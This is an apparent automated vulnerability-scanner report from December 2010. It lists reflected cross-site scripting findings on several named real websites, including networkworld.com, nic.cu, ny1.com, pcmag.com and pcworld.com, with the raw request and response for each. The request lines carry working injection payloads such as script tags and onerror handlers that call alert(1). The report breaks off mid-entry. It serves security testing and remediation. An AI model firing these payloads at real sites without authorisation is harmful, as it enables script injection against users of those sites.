HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Expires: Sat, 11 Dec 2010 02:08:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 11 Dec 2010 02:08:37 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: Apache=174.121.222.18.1292033317387206; path=/; expires=Mon, 10-Dec-12 02:08:37 GMT Content-Length: 74905
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f63a7'-alert(1)-'631ee0efcb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcastsf63a7'-alert(1)-'631ee0efcb6/panorama/2007/053007pan-markmonitor.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=281 Date: Sat, 11 Dec 2010 02:08:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 76464
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec0c5'-alert(1)-'08a5b738ebb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panoramaec0c5'-alert(1)-'08a5b738ebb/2007/053007pan-markmonitor.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=300 Date: Sat, 11 Dec 2010 02:08:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 76464
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3fe4'-alert(1)-'54aac2049a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007d3fe4'-alert(1)-'54aac2049a1/053007pan-markmonitor.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=300 Date: Sat, 11 Dec 2010 02:08:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 74872
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef8f7'-alert(1)-'c279a5bf410 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007/053007pan-markmonitor.htmlef8f7'-alert(1)-'c279a5bf410 HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Expires: Sat, 11 Dec 2010 02:08:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 11 Dec 2010 02:08:43 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: Apache=174.121.222.18.1292033322602363; path=/; expires=Mon, 10-Dec-12 02:08:42 GMT Content-Length: 76464
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 703b1'-alert(1)-'85dfc8023e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007/053007pan-markmonitor.html?703b1'-alert(1)-'85dfc8023e4=1 HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) nnCoection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=289 Date: Sat, 11 Dec 2010 02:08:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 108552
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a9e3'-alert(1)-'38cdb6b0534 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts5a9e3'-alert(1)-'38cdb6b0534/panorama/2007/073007pan-phishing.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=284 Date: Sat, 11 Dec 2010 02:08:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 74863
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57e99'-alert(1)-'ac3fbd54407 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama57e99'-alert(1)-'ac3fbd54407/2007/073007pan-phishing.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=293 Date: Sat, 11 Dec 2010 02:08:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 76455
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e750f'-alert(1)-'7f5ad6b06d0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007e750f'-alert(1)-'7f5ad6b06d0/073007pan-phishing.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=276 Date: Sat, 11 Dec 2010 02:08:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 74863
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25eda'-alert(1)-'2f98bf3e8f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007/073007pan-phishing.html25eda'-alert(1)-'2f98bf3e8f HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Expires: Sat, 11 Dec 2010 02:08:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 11 Dec 2010 02:08:40 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: Apache=174.121.222.18.1292033320828619; path=/; expires=Mon, 10-Dec-12 02:08:40 GMT Content-Length: 76452
1.156. http://www.networkworld.com/podcasts/panorama/2007/073007pan-phishing.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.networkworld.com
Path:
/podcasts/panorama/2007/073007pan-phishing.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74268'-alert(1)-'44759732f4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007/073007pan-phishing.html?74268'-alert(1)-'44759732f4b=1 HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) nnCoection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=279 Date: Sat, 11 Dec 2010 02:08:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106851
The value of the opt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2a00'%3balert(1)//6ba92ff6dfa was submitted in the opt parameter. This input was echoed as e2a00';alert(1)//6ba92ff6dfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /docum_det.php?doc_id=1&opt=1e2a00'%3balert(1)//6ba92ff6dfa HTTP/1.1 Host: www.nic.cu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 01:09:42 GMT Server: Netscape-Enterprise/6.0 X-Powered-By: PHP/5.3.0 Connection: close Content-Type: text/html Content-Length: 70334
The value of the opt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9407a"><script>alert(1)</script>5a944a8e5f was submitted in the opt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /docum_det.php?doc_id=1&opt=19407a"><script>alert(1)</script>5a944a8e5f HTTP/1.1 Host: www.nic.cu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 01:09:40 GMT Server: Netscape-Enterprise/6.0 X-Powered-By: PHP/5.3.0 Connection: close Content-Type: text/html Content-Length: 70362
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2504c"><img%20src%3da%20onerror%3dalert(1)>6a1c544711c was submitted in the REST URL parameter 3. This input was echoed as 2504c"><img src=a onerror=alert(1)>6a1c544711c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /bin/view/Legal2504c"><img%20src%3da%20onerror%3dalert(1)>6a1c544711c/ HTTP/1.1 Host: www.nic.gl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Sat, 11 Dec 2010 02:06:28 GMT Content-Type: text/html;charset=UTF-8 Connection: close Set-Cookie: JSESSIONID=D80CB563167F58B7F40439977702A9A0; Path=/ Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Language: en Content-Length: 8854
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <meta name="restURL" content="/rest/wikis/nicgl/spaces/Legal2504c"><img src=a onerror=alert(1)>6a1c544711c/pages/WebHome"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a77cf<img%20src%3da%20onerror%3dalert(1)>89b5dcafbe9 was submitted in the REST URL parameter 3. This input was echoed as a77cf<img src=a onerror=alert(1)>89b5dcafbe9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /bin/view/Legala77cf<img%20src%3da%20onerror%3dalert(1)>89b5dcafbe9/ HTTP/1.1 Host: www.nic.gl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Sat, 11 Dec 2010 02:06:37 GMT Content-Type: text/html;charset=UTF-8 Connection: close Set-Cookie: JSESSIONID=39D875D5EB41638FF3C0EAC0E8D5D511; Path=/ Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Language: en Content-Length: 8785
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <strong>Legala77cf<img src=a onerror=alert(1)>89b5dcafbe9</strong> ...[SNIP]...
1.161. http://www.nic.nu/about/terms.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nic.nu
Path:
/about/terms.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between XMP tags. The payload afe53</xmp><script>alert(1)</script>68e8a42f98c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within XMP tags does not prevent XSS attacks if the user is able to close the XMP tag.
Request
GET /about/terms.cfm?afe53</xmp><script>alert(1)</script>68e8a42f98c=1 HTTP/1.1 Host: www.nic.nu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sat, 11 Dec 2010 02:07:01 GMT Connection: close Content-type: text/html Page-Completion-Status: Abnormal
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6e01'%3b985fa83aacf was submitted in the REST URL parameter 1. This input was echoed as f6e01';985fa83aacf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny1f6e01'%3b985fa83aacf/OnTheAir/ny1_for_you.jsp HTTP/1.1 Host: www.ny1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Sat, 11 Dec 2010 02:08:11 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 55260 Vary: Accept-Encoding Cache-Control: public, max-age=551 Expires: Sat, 11 Dec 2010 02:17:19 GMT Date: Sat, 11 Dec 2010 02:08:08 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1 </title><meta name ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/ny1f6e01';985fa83aacf/OnTheAir/ny1_for_you.jsp'; var gRegionSelected = '1';//]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 336e6'%3ba3c60f719c7 was submitted in the REST URL parameter 2. This input was echoed as 336e6';a3c60f719c7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny1/OnTheAir336e6'%3ba3c60f719c7/ny1_for_you.jsp HTTP/1.1 Host: www.ny1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Sat, 11 Dec 2010 02:08:23 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 55257 Vary: Accept-Encoding Cache-Control: public, max-age=600 Expires: Sat, 11 Dec 2010 02:18:21 GMT Date: Sat, 11 Dec 2010 02:08:21 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1 </title><meta name ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/ny1/OnTheAir336e6';a3c60f719c7/ny1_for_you.jsp'; var gRegionSelected = '1';//]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be714'%3bb685d64afe5 was submitted in the REST URL parameter 3. This input was echoed as be714';b685d64afe5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny1/OnTheAir/ny1_for_you.jspbe714'%3bb685d64afe5 HTTP/1.1 Host: www.ny1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Sat, 11 Dec 2010 02:08:32 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56880 Vary: Accept-Encoding Cache-Control: public, max-age=566 Expires: Sat, 11 Dec 2010 02:17:56 GMT Date: Sat, 11 Dec 2010 02:08:30 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1 </title><meta name ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/ny1/OnTheAir/ny1_for_you.jspbe714';b685d64afe5/default.aspx'; var gRegionSelected = '1';//]]> ...[SNIP]...
1.165. http://www.ny1.com/ny1/OnTheAir/ny1_for_you.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ny1.com
Path:
/ny1/OnTheAir/ny1_for_you.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6169'-alert(1)-'132ff54a617 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny1/OnTheAir/ny1_for_you.jsp?a6169'-alert(1)-'132ff54a617=1 HTTP/1.1 Host: www.ny1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Sat, 11 Dec 2010 02:08:02 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=600 Expires: Sat, 11 Dec 2010 02:18:00 GMT Date: Sat, 11 Dec 2010 02:08:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 66693
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head id="ctl00_Head1"><title> NY1 For You: Don't Get Swiped When Bu ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?SectionPath=%2fcontent%2ffeatures%2fny1_for_you%2f&a6169'-alert(1)-'132ff54a617=1'; var gRegionSelected = '1';//]]> ...[SNIP]...
1.166. http://www.pcmag.com/article2/0,2817,2347163,00.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pcmag.com
Path:
/article2/0,2817,2347163,00.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38acc'-alert(1)-'dec265e1b08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article2/0,2817,2347163,00.asp?38acc'-alert(1)-'dec265e1b08=1 HTTP/1.1 Host: www.pcmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 11 Dec 2010 02:07:41 GMT X-AspNet-Version: 2.0.50727 X-AspNetMvc-Version: 1.0 X-Powered-By: ASP.NET Vary: * Cache-Control: public, max-age=0 Expires: Sat, 11 Dec 2010 02:07:56 GMT Date: Sat, 11 Dec 2010 02:07:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 82150
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35bd5'-alert(1)-'e792e9b86df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/171338/internet_security_trends_2009_an_interim_update.html35bd5'-alert(1)-'e792e9b86df HTTP/1.1 Host: www.pcworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=D2D737CC5B3F5AC682CAE590D7AEEF50; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sat, 11 Dec 2010 02:07:29 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" ...[SNIP]...
Logon.isValid = '' != Logon.userEmail;
/* Namespace RememberURI */ var RememberURI = new Object(); RememberURI.referer = '/article/171338/internet_security_trends_2009_an_interim_update.html35bd5'-alert(1)-'e792e9b86df'; if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) { RememberURI.query = ''; RememberURI.referer += RememberURI.query; document.cookie = "pcw.last_uri=" ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3136d'-alert(1)-'5dd4804b62f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /businesscenter/article/187449/baidu_lawsuit_registercom_rep_refused_aid_after_hack.html3136d'-alert(1)-'5dd4804b62f HTTP/1.1 Host: www.pcworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=021D6E1D6006A6161EC51E7CD684B1F5; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sat, 11 Dec 2010 02:07:41 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... = '' != Logon.userEmail;
/* Namespace RememberURI */ var RememberURI = new Object(); RememberURI.referer = '/businesscenter/article/187449/baidu_lawsuit_registercom_rep_refused_aid_after_hack.html3136d'-alert(1)-'5dd4804b62f'; if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) { RememberURI.query = ''; RememberURI.referer += RememberURI.query; document.cookie = "pcw.last_uri=" + e ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4534f"><a>2eeca12ce20 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /businesscenter/article/187449/baidu_lawsuit_registercom_rep_refused_aid_after_hack.html4534f"><a>2eeca12ce20 HTTP/1.1 Host: www.pcworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=CC790F93A57212884D4F8AF9DFBECDC1; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sat, 11 Dec 2010 02:07:33 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... ty/article;pg=article;aid=187449;c=1743;c=1730;c=1734;c=1730;c=2137;pos=336showcase;tile=2;sz=336x280; &url=/businesscenter/article/187449/baidu_lawsuit_registercom_rep_refused_aid_after_hack.html4534f"><a>2eeca12ce20"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 41e46<a>0d6dc089cc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
